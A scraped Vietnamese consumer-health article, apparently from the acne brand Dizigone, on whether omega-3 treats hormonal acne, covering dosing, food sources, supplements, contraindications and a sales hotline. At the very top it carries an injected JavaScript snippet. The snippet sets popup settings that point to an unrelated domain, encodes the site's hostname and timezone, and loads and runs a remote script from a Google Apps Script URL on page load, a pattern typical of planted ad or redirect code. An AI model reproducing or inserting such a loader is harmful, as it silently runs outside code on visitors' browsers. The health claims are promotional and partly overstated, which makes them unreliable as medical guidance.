var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Omega 3 trị mụn nội tiết có hiệu quả không? Cách dùng như nào hợp lý?

Sử dụng omega 3 có thể mang lại nhiều lợi ích cho sức khỏe như giảm các bệnh lý tim mạch, cải thiện não bộ, làm sáng mắt. Tuy nhiên, không nhiều người biết đến tác dụng trị mụn nội tiết của omega 3. Vậy omega 3 trị mụn nội tiết có thực sự hiệu quả không? Dùng Omega 3 như thế nào cho đúng? Hãy cùng chúng tôi tìm hiểu cách bổ sung omega 3 để cải thiện tình trạng mụn nội tiết trong bài viết dưới đây.

omega 3 mun noi tiet omega 3 mụn nội tiết

I. Omega 3 là gì?

Omega 3 là một loại acid béo không bão hòa hay acid béo không no. Đây là loại acid thiết yếu nhưng cơ thể chúng ta không thể tự tổng hợp được. Vì vậy, muốn dùng omega 3 trị mụn nội tiết, bạn cần phải bổ sung qua chế độ ăn uống và thực phẩm chức năng.

Có rất nhiều loại acid béo omega 3 khác nhau nhưng phổ biến nhất là alpha-linolenic acid (ALA), eicosapentaenoic acid (EPA) và docosahexaenoic acid (DHA). Các chất này tham gia vào nhiều cấu trúc trong cơ thể: tế bào thần kinh, thị giác,… mang lại nhiều lợi ích như:

  • Chống viêm
  • Chống trầm cảm
  • Cải thiện chức năng não bộ
  • Giảm nguy cơ hình thành các vấn đề tim mạch như vữa xơ động mạch, rối loạn lipid máu, đột quỵ

II. Vai trò của omega 3 trong điều trị mụn nội tiết

1. Omega 3 điều hòa nội tiết tố

Nguyên nhân gây mụn nội tiết chính là do sự gia tăng nồng độ hormon nội tiết androgen. Hormon này có khả năng điều hòa hoạt động tiết dầu của tuyến bã nhờn.

Có nhiều nghiên cứu đã chỉ ra mối liên hệ giữa omega 3 và nồng độ hormon nội tiết tố androgen. Khi nồng độ acid béo omega 3 tăng cao sẽ làm giảm nồng độ hormon androgen. Do đó, việc cung cấp omega cho cơ thể sẽ hạn chế quá trình tiết bã nhờn. Kết quả là tình trạng nổi mụn nội tiết cũng sẽ dần dần giảm đi.

2. Omega 3 ngăn ngừa mụn viêm

Ban đầu, mụn nội tiết hình thành do sự tích tụ tế bào chết, bã nhờn, bụi bẩn làm tắc nghẽn lỗ chân lông. Quá trình này tạo ra một môi trường kín tạo thuận lợi cho vi khuẩn gây mụn phát triển. Khi có mặt của vi khuẩn, mụn nội tiết dễ bị viêm nhiễm với biểu hiện sưng đỏ và gây cảm giác đau đớn, khó chịu.

Theo các nghiên cứu khoa học, 2 loại omega 3 là EPA và DHA được chứng minh có hoạt tính chống viêm hiệu quả. Bổ sung omega 3 giúp giảm các phản ứng viêm do giảm tổng hợp chất trung gian gây viêm prostaglandin (PG). Vì vậy, omega 3 đóng vai trò quan trọng trong trường hợp mụn nội tiết sưng đỏ.

Omega 3 còn là acid béo tham gia vào cấu trúc lớp sừng. DHA tạo lên hàng rào giữ ẩm và bảo vệ da khỏi tác động xấu từ bên ngoài. Do đó, khi sử dụng omega3 hàng ngày sẽ giúp da trở nên khỏe mạnh, mịn màng và tươi trẻ.

mun noi tiet mụn nội tiết

>>> Xem bài viết: Những điều cần làm ngay để thoát khỏi mụn viêm

3. Omega 3 ngừa thâm và hạn chế sẹo

Khi điều trị mụn nội tiết, người bệnh thường phải sử dụng các loại thuốc bôi ngoài da như benzoyl peroxide, BHA, retinol, tretinoin. Tác dụng không mong muốn chung của các hoạt chất này là làm tăng tính nhạy cảm của da với ánh nắng mặt trời. Chính vì thế, bạn cần sử dụng các biện pháp chống nắng để bảo vệ da.

Ngoài sử dụng kem chống nắng thì bổ sung omega 3 cũng giúp hạn chế ảnh hưởng của ánh sáng mặt trời lên da. Do omega 3 đã được chứng minh có tác dụng bảo vệ da khỏi tia UVA và UVB. Đặc biệt là 2 chất EPA và DHA sẽ giúp giảm đáng kể tính nhạy cảm của da. Nhờ vào khả năng này omega 3 sẽ hạn chế được vết thâm.

Chất EPA còn củng cố lớp collagen tự nhiên, làm chậm quá trình lão hóa da. Đồng thời, omega 3 còn thúc đẩy quá trình phục hồi da sau khi nặn mụn. Từ đó, nó góp phần hạn chế hình thành sẹo.

III. Cách bổ sung omega 3 trị mụn nội tiết

Khi bổ sung omega 3, bạn cần tìm hiểu hàm lượng EPA và DHA cần thiết cho cơ thể. Theo khuyến cáo của FDA (Cơ quan quản lý Thực phẩm và Dược phẩm Hoa Kỳ), một người không được dùng quá 3000mg EPA và DHA mỗi ngày. Nhu cầu bổ sung Omega 3 hàng ngày với một số đối tượng như sau:

  • Người bình thường khỏe mạnh: cần tối thiểu 250 – 500 mg EPA và DHA mỗi ngày. Phụ nữ cần khoảng 1100 mg/ngày, nam giới cần 1600mg/ngày.
  • Phụ nữ có thai: khoảng 500mg mỗi ngày trong suốt thai kỳ, có thể tăng lên vào cuối thai kỳ để cung cấp dưỡng chất hình thành não bộ và thần kinh của trẻ (khoảng 1400mg/ngày).
  • Người mắc bệnh tim mạch như bệnh động mạch vành cần khoảng 1g EPA và DHA mỗi ngày.
  • Bệnh nhân tiểu đường, cao huyết áp: cần 2000 EPA và DHA trong ngày.

Với trường hợp bị mụn nội tiết, bạn có thể bổ sung omega 3 qua chế độ ăn hoặc thực phẩm chức năng. Bạn có thể tham khảo cách bổ sung omega 3 trị mụn nội tiết dưới đây:

1. Qua chế độ ăn

1.1. Bổ sung Omega 3 từ động vật

Omega 3 là acid béo có nhiều trong các loại dầu cá như cá hồi, cá thu, cá trích, cá mòi, cá cơm, hàu,… Ngoài ra, một số loại thịt và trứng cũng chứa một lượng omega 3 nhất định. Do đó, bạn có thể bổ sung omega 3 hàng ngày bằng cách chế biến các món ăn từ cá và trứng.

Theo khuyến cáo của Hiệp hội Tim mạch Hoa Kỳ, mỗi người nên ăn cá ít nhất 2 lần/tuần để cung cấp đủ lượng omega 3 cần thiết trong quá trình trị mụn nội tiết và nhu cầu của cơ thể. Hàm lượng omega 3 trong một số loại cá và hải sản:

  • Cá thu: 100g cá chứa khoảng 5,134 mg Omega 3.
  • Cá hồi: 100g miếng phi lê chứa 2260 mg Omega 3.
  • Dầu gan cá tuyết: 2664 mg Omega 3/ mỗi muỗng canh.
  • Hàu: 565mg Omega 3 có trong 6 con hàu sống.

Khi ăn cá, bạn cần chú ý đến một số độc tố phổ biến như: thủy ngân, polychlorinated biphenyls (PCBs). Theo kinh nghiệm dân gian, loại cá càng lớn thì càng chứa nhiều chất độc này. Vì vậy, bạn nên chọn những loại cá nhỏ, sạch, nguồn gốc rõ ràng. Đồng thời, bạn không nên ăn quá nhiều cá, đặc biệt là phụ nữ có thai và đang cho con bú.

1.2. Bổ sung Omega 3 từ thực vật

Trong thực vật chứa nhiều acid béo omega 3 dạng ALA. Dạng omega 3 này không tác động trực tiếp tới mụn nội tiết. Nhưng theo các nghiên cứu, cơ thể con người có thể chuyển hóa khoảng 10% ALA thành EPA và DHA. Mặc khác, chất này còn có khả năng phục hồi hàm lượng vitamin E, vitamin C có lợi cho sức khỏe. Đặc biệt, vitamin E và C đóng vai trò chống oxy hóa, làm chậm quá trình lão hóa da. Vì vậy, bạn không nên bỏ qua thực phẩm giàu ALA.

Để cung cấp ALA cho cơ thể, bạn có thể sử dụng các loại hạt ngũ cốc như: hạt lanh, hạt chia, hạt óc chó, hạt gai dầu hoặc rau cải bó xôi, đậu nành,… Hàm lượng Omega 3 trong một số thực vật:

  • Hạt chia: 28g hạt chứa khoảng 4915 mg Omega 3.
  • Hạt óc chó: 28g (khoảng 7 quả) chứa 2542 mg Omega 3/
  • Đậu nành: 100g chứa 1443 mg Omega 3.

omega 3

2. Qua thực phẩm chức năng

Bên cạnh bổ sung omega 3 trị mụn nội tiết qua chế độ ăn, nhiều người lựa chọn các thực phẩm chức năng như dầu cá. Cách này giúp người bệnh kiểm soát được lượng omega 3 bổ sung và hạn chế được các tác dụng phụ nếu dùng quá liều.

Trong 1000 mg dầu cá thường chứa khoảng 300 mg EPA và DHA. Vì vậy, thông thường mỗi người sẽ cần uống từ 1 – 2 viên mỗi ngày kèm với lượng Omega 3 bổ sung qua chế độ ăn. Nếu dùng quá liều Omega 3 có thể gây ra tác dụng phụ như: tiêu chảy, chảy máu chân răng, chảy máu cam, hạ huyết áp, mất ngủ.

Ngoài dầu cá, bạn có thể sử dụng tảo biển, đặc biệt là vi tảo. Đây là một nguồn triglyceride khác cung cấp EPA và DHA. Dầu tảo là lựa chọn thay thế dành cho những người ăn chay hoặc dị ứng với cá và hải sản.

Một số đối tượng không nên sử dụng thực phẩm chức năng chứa Omega 3 trị mụn nội tiết:

  • Phụ nữ sử dụng thuốc tránh thai: do thuốc làm giảm tác dụng của Omega 3.
  • Người huyết áp cao: dầu cá có tác dụng hạ huyết áp nhẹ. Vì vậy, khi dùng đồng thời, tác dụng hạ huyết áp sẽ mạnh hơn.
  • Người có rối loạn đông máu: omega 3 làm tăng nguy cơ chảy máu khi dùng với các thuốc chống đông.
  • Người dùng thuốc giảm cân Orlistat: có thể giảm hấp thụ dầu cá. Bạn nên dùng 2 thuốc cách nhau ít nhất 2 giờ.
  • Người dị ứng cá và hải sản: có thể bị mẩn đỏ da, viêm họng, khó thở,…

>>> Xem thêm: Mình đã hết 90% mụn viêm nặng chỉ sau 1 tuần

IV. Lưu ý khi dùng omega 3 trị mụn nội tiết

Để dùng Omega 3 trị mụn nội tiết đạt hiệu quả cao, bạn cần lưu ý:

  • Uống đúng liều lượng cho phép: theo hướng dẫn của bác sĩ, không quá 3000mg/ngày. Bạn cần điều chỉnh liều lượng khi mụn nội tiết giảm dần.
  • Uống đúng giờ: Sử dụng Omega 3 vào buổi sáng để cơ thể hấp thu tốt hơn. Bạn nên uống omega 3 sau khi ăn.Vì omega 3 tan trong dầu sẽ được hấp thu tối đa khi dùng với bữa ăn có chất béo.
  • Không lạm dụng thực phẩm chức năng: mỗi ngày uống từ 1 – 2 viên là đủ. Thực phẩm chức năng không phải là thuốc và không thể thay thế thuốc trị mụn nội tiết.
  • Bạn cần kết hợp bổ sung omega 3 từ dầu cá và chế độ ăn hàng ngày.
  • Ngừng sử dụng và báo cho bác sĩ nếu có bất kỳ dấu hiệu rối loạn tiêu hóa.

Omega 3 không chỉ hiệu quả trong điều trị mụn nội tiết mà còn có lợi cho sức khỏe tim mạch và não bộ. Vì vậy, bạn cần bổ sung omega hàng ngày qua chế độ ăn hoặc thực phẩm chức năng. Tuy nhiên, bạn cần sử dụng omega 3 đúng theo hướng dẫn của bác sĩ hoặc chuyên gia dinh dưỡng để hạn chế các tác dụng phụ. Để biết thêm về cách điều trị mụn nội tiết, bạn hãy gọi tới số Hotline: 19009482. Chuyên gia của Dizigone sẵn sàng tư vấn và giải đáp thắc mắc cho bạn.